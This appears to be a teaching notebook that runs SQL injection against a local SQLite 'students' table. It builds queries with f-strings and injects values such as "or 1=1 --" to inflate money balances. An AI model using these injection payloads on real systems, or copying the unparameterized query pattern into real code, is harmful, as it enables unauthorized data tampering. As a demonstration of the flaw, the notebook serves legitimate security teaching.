In [1]:
import sqlite3
import os

if os.path.exists("another.sqlite"):
	os.remove("another.sqlite")

db = sqlite3.connect("another.sqlite")
cursor = db.cursor()

In [2]:
cursor.execute("drop table if exists students")

In [3]:
cursor.execute("create table if not exists students (netid text primary key, name text, money int)")

In [6]:
netid = "abc123"
name = "Someone Else', 1000000) --"

cursor.execute(f"insert into students values('{netid}', '{name}', 50)")
db.commit()

In [7]:
cursor.execute("select * from students").fetchall()

[('foo123', 'Foo Bar', 50), ('abc123', 'Someone Else', 1000000)]

In [8]:
netid = "foo123' or 1=1 --"

cursor.execute(f"update students set money = 9000000 where netid = '{netid}'")
db.commit()

In [10]:
new_name = "Foo Bar', money=9000000 where netid='foo123' --"
netid = "foo123"

cursor.execute(f"update students set name = '{new_name}' where netid = '{netid}'")
db.commit()

In [11]:
cursor.execute("select name, money from students where money > 70").fetchall()

[('Foo Bar', 9000000), ('Someone Else', 9000000)]